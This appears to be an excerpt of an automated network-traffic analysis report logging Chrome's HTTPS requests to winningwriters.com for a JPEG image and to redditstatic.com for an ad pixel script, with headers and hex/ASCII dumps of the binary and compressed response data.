                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: d8 45 08 55 40 3f d9 5b 42 5c 60 3a 19 d0 2f cc 4b d2 2e df f4 e7 b7 bd 01 7a e9 f4 75 59 d3 1b 0e da b5 3f 6c bc ee 5a 4b 23 75 75 4a af 73 cd 52 6f 75 96 fb 8a 28 ee 4d 5c 1b 79 cf 3b 53 0f a8 12 99 69 29 9a 60 36 de bf f2 bb d8 9e a6 bd 2e fa 5d dc d6 1b f6 cf ea 27 5a fa 4c e9 b5 6f 1e a5 32 ed e2 c5 6d ea 66 ce 62 a5 6b 66 df 7d f3 69 d1 5d 6f bd 52 51 b8 d2 5b 75 f6 4a d2 00 4a 8a d1 e5 aa 03 a3 5e 8a fd 3c 75 a7 d2 be c5 ba f4 37 7a 75 12 d7 d5 7e 8c 6d aa a7 de e8 25 fd 6a ad 46 eb b3 5a ea 57 e7 0b 3d c9 b7 9b f2 56 cd 3c e4 d2 9a 71 40 12 a2 90 94 10 90 1b 93 80 90 13 99 96 1c 3e b8 03 39 8f 87 1e 46 5f b6 00 f1 e6 47 7e 1f 44 01 99 23 1c 0f b6 02 81 f8 bb 41 c6 02 f3 b6 b6 e6 e0 de 57 fb 76 d5 da 76 5a ad c7 b8 af 0a 2d da ec d4 4c 2e a2 a1 e5
                                                                                                                                                                                            Data Ascii: EU@?[B\`:/K.zuY?lZK#uuJsRou(M\y;Si)`6.]'ZLo2mfbkf}i]oRQ[uJJ^<u7zu~m%jFZW=V<q@>9F_G~D#AWvvZ-L.
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 38 01 90 33 9f d9 80 04 81 c6 52 cc 40 1e 72 1c 71 80 53 04 67 8f 13 94 03 54 a4 b6 8f 35 c3 e5 36 3e 27 15 80 13 ed 30 18 be f5 df 5b 4f a7 3b 17 73 75 43 7b 5d 1d b2 f4 ef 65 b4 9a 8d d7 bb 9b b7 dd 2e 54 d4 4d 2d c0 ca 0a d3 69 a6 aa 5c d6 a2 12 90 12 66 79 0c 60 39 7f b0 7f 3b bf cb eb 7b f5 a6 8f a6 77 cd dd b9 ba 5d d3 1a b9 32 3d 4a 5d 76 fd 45 65 91 ba d5 2c 21 28 7e d5 6c 53 97 06 a9 c8 54 fc f2 82 47 da 6c 08 0f ad 1f 4a be 8d 3d 1e f5 d3 63 6d fe ac 6c af 51 4c 7a aa d8 b7 20 cd 4d 2d cb 6c 5d ad ed 6d fa 90 a0 16 96 1f fc 25 c7 aa 04 a4 42 db 5b c8 5f 05 81 22 20 3a fd b6 b6 ae db d9 f6 3b 7e db da d6 1a 3d bb 61 b5 20 37 6f b3 d1 53 b7 4f 4c ca 73 3a 10 d8 00 4c 99 93 99 38 9c 60 2f c9 09 90 d2 04 8e 52 80 74 02 80 50 0d 26 47 1e 38 0f d0 40
                                                                                                                                                                                            Data Ascii: 83R@rqSgT56>'0[O;suC{]e.TM-i\fy`9;{w]2=J]vEe,!(~lSTGlJ=cmlQLz M-l]m%B[_" :;~=a 7oSOLs:L8`/RtP&G8@
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 50 0b 9e 1d d0 08 63 c2 7d be e8 05 d9 38 08 9f ae 66 5d 29 de 04 f8 be e9 89 4f 8f f7 c6 79 c0 72 ee bc e9 04 7c 44 4a 62 40 e9 1e ce 38 e5 01 63 04 02 b0 46 a0 55 8a 41 99 12 e1 2c 20 3c a5 d0 5e 48 49 27 ef 26 47 3c c4 05 c5 87 06 94 a9 59 f8 a5 2c 8a 4f b0 91 01 75 6d e4 78 42 8e 04 09 a8 e4 31 f6 ce 02 4c da ce 05 2d b0 48 48 20 67 cc 61 8c a0 36 47 6d 2c 94 b6 52 b2 4a 44 d4 06 33 e3 01 12 dc 69 dc db 3d 50 ac 46 8f 26 82 f1 e5 be 95 10 4a 74 b8 66 a9 10 70 99 98 30 1b 54 d5 bd 75 b7 1d 9f 5f 4a 57 46 cb c5 90 e9 41 08 08 61 2e 00 55 a8 73 4e 13 38 c0 74 d3 a1 57 5a 4a 3d e1 6f a8 ab 59 71 87 da 2c d0 be 56 12 94 a5 04 85 28 84 cc 10 bd 7a 89 30 1b 91 74 b3 b5 6a 66 f7 72 a6 4a 9c 45 6a 95 50 96 34 05 25 6f 38 9d 0e 29 20 91 24 89 63 8f 64 06 9f 6f
                                                                                                                                                                                            Data Ascii: Pc}8f])Oyr|DJb@8cFUA, <^HI'&G<Y,OumxB1L-HH ga6Gm,RJD3i=PF&Jtfp0Tu_JWFAa.UsN8tWZJ=oYq,V(z0tjfrJEjP4%o8) $cdo
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: a1 a5 48 5a 1c 05 2b 42 86 0a 4a 81 04 60 66 30 80 f9 f7 fc c4 3f 24 ed a3 d5 3a 1d c9 d6 6f 46 d6 ea 4d 9d d4 e2 5d ae dd 7d 04 f0 52 d9 ef 8a 0a f3 16 ed 89 6a 21 14 75 6b cb e5 0f dd 38 7e 02 83 e1 21 f2 5d b8 36 d5 fb 6a 5e 6e 3b 77 72 5a 2a 2c 7b 82 ce fb 94 b7 9b 1d 5b 0e d3 d6 51 d5 34 b2 da d9 7d 97 92 95 a1 c4 90 41 49 10 16 ef b9 0c b8 80 e2 83 aa 52 40 44 e4 93 94 c9 39 10 0c e5 01 21 f4 cf ab 3d 4e e9 0d fd cd c9 d3 0e a4 5e 7a 6d 7e 14 ae d2 bd 7c b1 5c 6a 6d b5 6e d2 bb a4 ad 85 3b 4a b6 d4 b4 12 07 84 92 30 c2 03 af 7e 81 ba 53 eb 8f f3 0e ba ef d4 db bd 7a 6e 0d 87 b4 f6 22 29 07 51 6a 6b b7 6e e0 b8 5e 96 dd ce 68 6d 74 d6 ca 6a 86 d6 b6 16 52 5b 53 cb 71 08 4a e4 93 89 13 0f a7 cf 48 fe 8e 7a 55 e8 b7 60 ee 0d 89 d3 6b a5 db 76 5d 37 bd
                                                                                                                                                                                            Data Ascii: HZ+BJ`f0?$:oFM]}Rj!uk8~!]6j^n;wrZ*,{[Q4}AIR@D9!=N^zm~|\jmn;J0~Szn")Qjkn^hmtjR[SqJHzU`kv]7


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            40192.168.2.164975766.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:07 UTC891OUTGET /graphics/tomstory/liu_home_page_slide.jpg HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:08 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:07 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Mon, 14 Oct 2024 19:41:24 GMT
                                                                                                                                                                                            ETag: "1f88e-62475059bb42a"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 129166
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:07 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            2024-11-18 20:00:08 UTC7835INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 5a 00 00 ff e1 03 8e 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 61 36 61 36 33 39 36 38 61 2c 20 32 30 32 34 2f 30 33 2f 30 36 2d 31 31 3a 35 32 3a 30 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                            Data Ascii: ExifII*DuckyZhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 61 90 32 c1 1d 1b 63 b2 9c e9 5c 04 aa d9 c2 d3 db cc 57 73 b9 01 c9 d3 21 40 05 35 19 60 2c 3c 53 f0 d6 b7 66 6e 6f 88 7e 7a c1 d5 d8 da c5 76 fc 7b 89 87 e5 3e b4 51 c8 68 3a ad 33 c0 76 07 67 7e b7 39 0e c7 ed ce cc ed be d6 fd 3c f6 4c eb d9 30 c7 63 c4 f3 dc af 1f 6b c8 f3 2d 60 84 19 22 b9 bd 9a d5 a5 94 4c 05 24 6f cc 47 5a e7 80 dc bd 97 fe aa 5e e4 f6 37 0d 27 0d 1f b4 9d a9 6d 60 a5 85 85 8f 09 66 bc 5d a5 a8 66 22 30 22 8c 79 8a 2d 05 5c 9d d4 a9 a5 70 13 bc 17 fa 98 f2 1d c1 25 c0 f7 3b b0 e0 58 ef 2e 16 7b 6e 7f 8e 5f a7 5b 09 5c 04 d9 e9 43 9c aa eb 5d f2 48 c0 a9 a6 d0 73 18 0e 83 b1 fd 6c fb 14 2c 6e 25 b6 ef e9 78 b9 64 0a 97 1c 6b 3c f1 2c a2 75 f3 81 22 0d 92 50 1f 38 d7 01 ad b9 2f d7 57 66 dc 72 63 87 ec 0e 05 7b b7 9e 75 2d c4 b3 f2
                                                                                                                                                                                            Data Ascii: a2c\Ws!@5`,<Sfno~zv{>Qh:3vg~9<L0ck-`"L$oGZ^7'm`f]f"0"y-\p%;X.{n_[\C]Hsl,n%xdk<,u"P8/Wfrc{u-
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 7a fc 32 c0 42 4f 2f 23 c6 5b c1 ea 5e 5c b9 f3 c7 14 cc 8a 2e 25 94 50 ab 91 98 de b4 a3 1f de 02 a3 3c 02 16 9c 9d df 30 d6 e7 e9 92 6b 98 d9 fe b0 a8 31 2c e3 6d 41 29 50 c0 d4 66 34 f0 c0 58 6c 39 2b 58 9a 49 cc 5e aa b1 22 7e 3a eb 71 6d 94 e9 2a d4 80 3a eb f7 60 36 3f 6f f2 5c 4c 2e 51 2c 5c dc 91 ba de 6a 01 29 5a 80 69 ad 40 a8 d7 2c 05 f2 33 ea a9 62 c0 e5 e7 60 4b 66 47 dd 80 1a 12 68 33 26 9e 3d 70 06 08 49 ca b9 fd da e0 03 52 49 ad 6a 7a d7 ae 00 29 d2 b5 a8 35 eb 80 2e da 75 20 b6 87 2c b5 fe cc 01 4a 1a eb 9f 53 e3 f7 e0 13 65 02 80 6b fd 63 2e b8 04 c2 75 22 84 e4 7a 7c 7c 70 00 c3 c3 5f 0c ba 74 c0 24 52 9b be 74 18 02 ed a5 3c 3a 9e 99 fc b0 00 c3 ca 41 aa 8d 46 00 a4 02 7c 30 12 3b 4f f2 7f 87 d5 6b ff 00 c1 c5 83 e9 ab e1 af 8e 20 ca
                                                                                                                                                                                            Data Ascii: z2BO/#[^\.%P<0k1,mA)Pf4Xl9+XI^"~:qm*:`6?o\L.Q,\j)Zi@,3b`KfGh3&=pIRIjz)5.u ,JSekc.u"z||p_t$Rt<:AF|0;Ok
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 65 80 90 ff 00 f0 36 dd a7 fc df ff 00 65 8b 07 d2 fd 69 ae b8 80 7a e9 80 0f e9 97 c7 01 9a e5 d7 c3 01 84 57 33 f7 e0 33 a0 eb 4d 70 03 f6 7c f0 18 2a 08 23 32 70 03 4c be 07 5c 00 67 96 59 74 f1 c0 61 15 eb 90 eb 5a e0 30 53 a5 7e 3d 72 c0 0e bf 96 bf 0e 83 00 39 81 d7 f0 c0 00 04 0a 1d 7a 0e 98 0c f3 7c 3f ec e0 00 9f 30 cf e7 d3 00 f2 de 94 60 56 a2 be 22 9a 60 25 6d c8 14 ea 7e 59 60 2d 5c 7c b2 25 36 48 54 b7 8e bf 67 86 02 f5 c7 cf 71 48 81 99 83 29 dc 29 ad 7e 63 01 b0 61 b4 b6 e7 23 8a df 96 6a 2a 95 31 5f c5 1a 1b 94 a1 a9 15 3a a9 1a 83 80 5f fe 8a ba 3c 8c 36 7d b9 6b 27 2b 05 ce c5 b6 9e 47 48 e5 90 b8 27 68 56 21 45 08 a6 b8 0d d1 d8 fe d8 77 24 97 16 f7 1c 87 b6 51 f3 2d c6 49 eb 7d 25 e7 2a f6 cb 37 a4 40 28 f6 91 a4 9e a2 9d d5 02 a0 35
                                                                                                                                                                                            Data Ascii: e6eizW33Mp|*#2pL\gYtaZ0S~=r9z|?0`V"`%m~Y`-\|%6HTgqH))~ca#j*1_:_<6}k'+GH'hV!Ew$Q-I}%*7@(5
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: cb 2c f6 8f c7 40 d7 89 2c 4b 6a 77 b4 ca 63 34 54 39 d6 95 a9 c0 79 59 ed af bd d6 b7 fe dd 76 f7 2b de 17 fd c3 ff 00 cb de 49 67 8e 4e 07 9b ee 2e 27 b6 fb 56 c6 f2 39 4c 08 d7 76 fc 4c 73 dc 5d 07 54 f2 a0 ae fd c3 23 80 9c ec 1e ec b5 ed 2f 76 4d 8b 5e f0 57 7c 17 39 04 50 5c f0 5c 6c 57 b1 25 af ab 2f af 6d 23 cf 76 b1 b8 92 32 ea 5a 26 8d 4e c3 d0 e0 3b 69 2d a7 86 28 e4 29 41 ea 01 7b 3c 6b fc 22 e1 a9 90 35 d7 43 80 90 8b 79 6b 8b 58 a0 36 ed 52 62 8d 80 5a 81 98 6f 2e 98 04 ae 2d 6d ed e1 b7 0a 5a 56 79 2a 25 07 79 46 5a 1c c7 c6 b8 04 47 1a 93 4d 71 21 05 98 90 b2 13 4c b7 64 69 fb 70 19 3d b3 db 4d 14 49 19 69 ec 77 ed bb 6a aa b2 6d c8 01 e3 9e 00 23 9e 57 12 2e 61 80 a9 a8 04 93 5a 1c f0 13 76 96 85 4d b5 cc 61 43 10 9f c2 24 02 d5 24 55 49
                                                                                                                                                                                            Data Ascii: ,@,Kjwc4T9yYv+IgN.'V9LvLs]T#/vM^W|9P\\lW%/m#v2Z&N;i-()A{<k"5CykX6RbZo.-mZVy*%yFZGMq!Ldip=MIiwjm#W.aZvMaC$$UI
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 9b ca 85 a6 62 a0 9e a6 84 f8 91 80 93 e3 bb 1b dc 6f 6b 3b 85 39 44 e1 f8 ae 57 98 e0 63 92 f3 86 e2 6e ef 16 e2 da fe 47 a2 81 1f d3 9a ba 8a 92 a5 88 51 4c eb 4c 06 c5 e7 bf 52 12 f2 28 d3 71 b4 b8 e4 ae 04 1f 51 c9 09 2e 20 41 3d 36 5c 0b 7d ee fb 55 1b ca 01 af 8e 55 a6 03 58 77 0f 73 71 3d dd 22 f2 1c dd 9d fd ff 00 26 90 34 16 53 9b b5 92 38 b7 35 45 03 6b 9e 74 d3 01 55 b9 e3 38 39 22 93 e9 2e ee ed a0 75 1b 44 96 e2 59 10 8a 02 b5 57 5a 9e bf 2c b0 10 36 dd bb 1c 8b 3b de db b3 7d 44 6d 14 20 90 47 a5 d3 25 20 96 27 e0 40 c0 58 7b 63 b5 ed ed 8c 10 47 10 fa d2 42 99 14 d2 a1 9a 83 6d 6b 98 d3 2e b9 e0 36 17 71 f6 ad 94 96 16 ab 6d 66 d3 2d bd 0d c4 1b 95 58 28 6a b0 53 91 04 13 ad 09 c0 69 1e ed ed e6 89 ad 4a f1 ed 0b 46 b4 01 55 f7 02 c3 73 12
                                                                                                                                                                                            Data Ascii: bok;9DWcnGQLLR(qQ. A=6\}UUXwsq="&4S85EktU89".uDYWZ,6;}Dm G% '@X{cGBmk.6qmf-X(jSiJFUs
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: e4 59 39 2e d6 b8 64 ba 8f 8e 74 8b 62 3d c5 c4 59 47 2a 83 95 bc 26 83 f7 c8 d3 01 a3 f9 0e e4 8a f7 97 e5 6e 79 ae 60 5d f2 56 31 0b de 7d dd b7 35 bd bf 99 81 92 99 20 a2 9d a9 ad 3a 75 c0 79 e9 79 ce bc bc e7 2b dc b1 20 59 f9 0b a9 ee 6c e5 64 2c f1 b4 d3 16 8d d5 06 b2 00 40 51 43 43 d0 9c 07 6d fb 5f fa 69 ec 9b 88 78 5b ff 00 74 1b 92 ee 5e f2 bd 5f e6 5d ed db f1 df 45 61 c2 76 ed ab b8 68 d3 95 b9 89 5e 7b 89 8a 90 67 8a 16 1b 6b b4 50 8c 07 53 5a 77 6f 68 f6 64 90 f6 87 e9 f7 db ae 2f 8c 9a 6a a3 73 76 76 22 13 3c 8a c0 93 17 aa 4c 8f 0e 55 76 9d f6 d3 a0 d7 01 58 84 47 c3 f3 17 cb 6e 2d fb b7 bc 6e 59 ae 39 be 6d e5 68 ec 38 e7 77 f5 65 d9 33 15 a6 a3 f8 d5 0c 7f 2a 50 66 41 e4 fe e4 dc f1 56 51 f0 dc 6d d0 e7 5c ac 8d cc 72 df c4 b7 86 7b c9
                                                                                                                                                                                            Data Ascii: Y9.dtb=YG*&ny`]V1}5 :uyy+ Yld,@QCCm_ix[t^_]Eavh^{gkPSZwohd/jsvv"<LUvXGn-nY9mh8we3*PfAVQm\r{
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: b8 0c af de 7a e0 33 53 e3 80 ce b9 64 47 4c 06 65 e3 91 c0 67 51 5c 00 e5 e3 42 46 66 98 0c 15 39 7e 60 34 1a 60 04 d4 e5 4f 90 a6 78 00 02 9d 46 03 3a d4 1d 70 18 35 a8 22 be 18 03 1c c6 79 78 60 01 41 d0 10 3e 3e 38 00 3a d6 95 fc 33 c0 28 8a 6a 5b 41 d7 ae 01 dc 42 b9 fe f5 75 d7 f6 53 00 fa 24 42 46 e0 18 fc 46 02 52 07 b7 4a 79 d5 7f e1 a5 4f e1 80 97 87 92 8e 30 3d 34 69 4f ff 00 44 7e 38 07 a9 ca 5e 9c a3 71 6e be 08 33 fb db 00 e6 37 92 5c e5 90 ca c7 ab 31 3d 3e 38 09 48 29 90 03 4d 06 99 60 25 22 ae 5d 29 ae 01 fa 67 50 49 19 6a 29 80 8e bb b8 51 0c b6 5c cc 5e 9d ad c6 51 72 71 a9 68 c3 57 ca 59 75 46 1f 76 02 96 04 b6 d7 31 c8 93 18 ee 6c dc 35 b5 e4 32 15 74 61 a3 c6 f1 90 41 f0 20 e0 3a c7 d8 6f 76 7b f3 9e f7 07 b1 fd bc e4 ac d7 bc d3 ba
                                                                                                                                                                                            Data Ascii: z3SdGLegQ\BFf9~`4`OxF:p5"yx`A>>8:3(j[ABuS$BFFRJyO0=4iOD~8^qn37\1=>8H)M`%"])gPIj)Q\^QrqhWYuFv1l52taA :ov{
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 93 2d d7 72 f2 55 1b be ab b3 6e d2 2b 7e e0 0e c8 b5 a4 2a 23 bd 44 51 f9 e3 6e 87 01 f2 4c 3b e7 b6 79 9b 59 20 b1 e3 f9 0e e8 b0 bb 5a 38 83 89 9e e2 d2 64 61 a8 69 95 51 81 1a 1c 02 5c 2f 1d db 56 52 8b ae 3f db 8b de 0e 44 1f c2 ff 00 90 40 23 07 aa 20 9d 95 09 ff 00 85 46 02 67 98 e3 3b 6f bb 2d a3 e2 fb 83 89 6b 95 62 df 49 6f 73 04 b1 4e 8c da 98 dc 0f 29 23 a0 39 f8 60 3d f8 ff 00 44 9e df ed ee c4 f6 a7 df 2e 7e c7 b2 6c 3b 87 9b ed de f6 e2 65 ec ee f8 e7 61 3c c7 23 c0 a4 7d b4 9e a4 36 12 de 07 30 46 59 83 ec 8f 6d 18 d4 50 e7 80 f6 77 95 ef 8e f9 bf 33 c9 2f 3b 24 4d 23 23 b4 b1 28 86 37 12 d4 b3 2a 26 7b 86 ea 9c c9 3a e0 35 b5 cd aa cf c9 b7 f3 1b e9 af 5e e7 27 bb 91 8b cd b4 1c 89 63 5f cc 7c 34 eb 80 71 c5 f0 1c 9f 2d 2c b0 f1 90 bb 47
                                                                                                                                                                                            Data Ascii: -rUn+~*#DQnL;yY Z8daiQ\/VR?D@# Fg;o-kbIosN)#9`=D.~l;ea<#}60FYmPw3/;$M##(7*&{:5^'c_|4q-,G
                                                                                                                                                                                            2024-11-18 20:00:08 UTC8000INData Raw: 1a 1b 76 63 52 c1 c1 a7 98 e5 97 db 80 90 b1 fd 41 76 2f 71 40 8d db bc aa 48 54 8d 96 d2 12 92 0a f5 a1 a1 a5 46 01 87 31 ef 17 15 60 55 90 c7 24 d6 de 74 8c 48 a1 5c 8c d8 92 4d 2a 06 87 01 0f db be eb d8 73 11 dd 3a 5f 7d 5c 4e c7 70 49 55 d5 5b 3a 80 c7 30 53 42 34 d6 83 01 3d 75 cd 49 79 00 95 d4 6f 7a fa b3 03 b8 6d a6 40 8a d4 03 e1 80 a8 5d 5d 32 ab 3b a2 a9 35 0d 18 fc 8a 1b 20 74 ad 7e 58 0d 7b cc b8 59 77 23 fa 94 a0 54 ce 95 63 40 33 d0 f8 e0 34 0f b8 3c e8 b4 ed eb 95 32 86 0f 2c 91 6e 06 a9 47 72 95 04 50 9d 34 18 0f 1c bb df 95 3d c1 de bd c9 c9 fa de ac 52 5c 34 16 ef 4c 8c 56 ff 00 c2 1f fd 53 80 ac 1c c9 3a fe dc bf d9 80 29 a8 24 83 a6 01 26 04 ee a9 fc ba 9d 30 0d 9c 0a 90 34 6d 46 01 a3 ae 6c 41 a7 f4 f8 9c 02 1a 64 4e 5e 19 e7 9d 30
                                                                                                                                                                                            Data Ascii: vcRAv/q@HTF1`U$tH\M*s:_}\NpIU[:0SB4=uIyozm@]]2;5 t~X{Yw#Tc@34<2,nGrP4=R\4LVS:)$&04mFlAdN^0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            41192.168.2.1649767151.101.193.1404436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:08 UTC534OUTGET /ads/pixel.js HTTP/1.1
                                                                                                                                                                                            Host: www.redditstatic.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 12126
                                                                                                                                                                                            Last-Modified: Tue, 15 Oct 2024 19:34:59 GMT
                                                                                                                                                                                            ETag: "5e9ac3a42b557bf8ca38cf2e8baba70b"
                                                                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                                                                            Cache-Control: public, max-age=60
                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:08 GMT
                                                                                                                                                                                            Vary: Accept-Encoding,Origin
                                                                                                                                                                                            Server: snooserv
                                                                                                                                                                                            Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                            NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.02, "failure_fraction": 0.02}
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d4 3b 6b 73 da c8 96 7f 05 ab 6e b8 92 69 cb 80 b1 93 08 6b 5c 04 e4 98 89 8d bd 3c 9c 4c b9 18 4a 96 1a 50 22 24 46 12 71 bc 86 fd ed 7b fa 25 b5 04 b6 93 3b 3b 1f 36 95 42 dd 7d 4e 9f 77 9f 3e dd 92 f7 a6 ab c0 49 bc 30 28 45 2a 46 01 4a b4 a7 74 24 54 3d 34 d5 9e bc a9 ba 17 dc 79 63 d6 c2 b4 f5 dd 8e 4a 8e a9 08 54 c5 34 93 c7 25 0e a7 a5 08 ff b5 f2 22 5c 2e f3 46 93 cc 99 96 cb 8e 16 e1 64 15 05 25 07 88 ee 55 35 32 be 12 63 2b 3e 46 a8 da 66 80 1f 4a 56 14 85 91 aa b4 ed 20 08 93 d2 d4 0b dc d2 22 74 57 3e 2e fd 5b a9 78 15 e5 df 8a d6 4c e6 51 f8 50 b2 75 27 74 b1 a9 5c 5d 77 46 97 d6 a4 77 3d 9c 9c 5f 8f 7a 1d 05 d9 1b 42 6f 69 12 d9 cd 27 fc 63 19 46 49 6c 3c 6d 36 4d a2 c3 5d 75 ac 3b b6 ef ab 4b 9d 83 90 d0 46 8d
                                                                                                                                                                                            Data Ascii: ;ksnik\<LJP"$Fq{%;;6B}Nw>I0(E*FJt$T=4ycJT4%"\.Fd%U52c+>FfJV "tW>.[xLQPu't\]wFw=_zBoi'cFIl<m6M]u;KF
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 35 f4 02 55 21 55 c8 12 ba 52 28 00 06 cc cb 94 67 fd 4b 16 4d ac c3 63 0b 15 bc 28 63 12 5f d6 b5 4c bb 23 58 a4 94 11 f1 20 a7 02 9b 27 d8 1f ce 82 75 0d 81 8c 74 ed 7a 6f de ed 37 5e f5 af cc e9 b0 4e 72 fd 25 54 64 41 8d bb 96 77 fe 31 ef fa 94 fe df 77 b0 44 87 39 8f 39 4c 9f 46 e1 82 8c b6 61 1b a0 6e cf fc 27 4f 79 d6 85 0c 29 e7 c5 74 88 3b 32 ed 3f e3 cb 02 3e 55 4a 56 65 6d aa a0 41 39 23 e3 70 79 5b 89 ea 69 c2 97 a0 e8 ab be 2c 70 22 ce 1c 25 d3 77 dc 95 b4 f9 8a 23 a5 d2 de c5 64 eb 1c f5 bb ed 70 b1 84 4c 04 c1 86 63 c7 5e 62 95 c5 84 b4 9b 66 04 b4 b4 dc 07 5a c5 52 ff ca f6 c1 86 0b a8 e6 47 c3 f3 83 77 25 d7 4e 6c 85 08 59 b0 f9 0a 04 a5 16 e7 92 70 7e 14 4b 5d 05 5c 0a b6 b5 e7 e4 13 13 35 42 f4 c3 6a 3a c5 11 76 3f f8 a1 f3 ad e5 cf c2
                                                                                                                                                                                            Data Ascii: 5U!UR(gKMc(c_L#X 'utzo7^Nr%TdAw1wD99LFan'Oy)t;2?>UJVemA9#py[i,p"%w#dpLc^bfZRGw%NlYp~K]\5Bj:v?
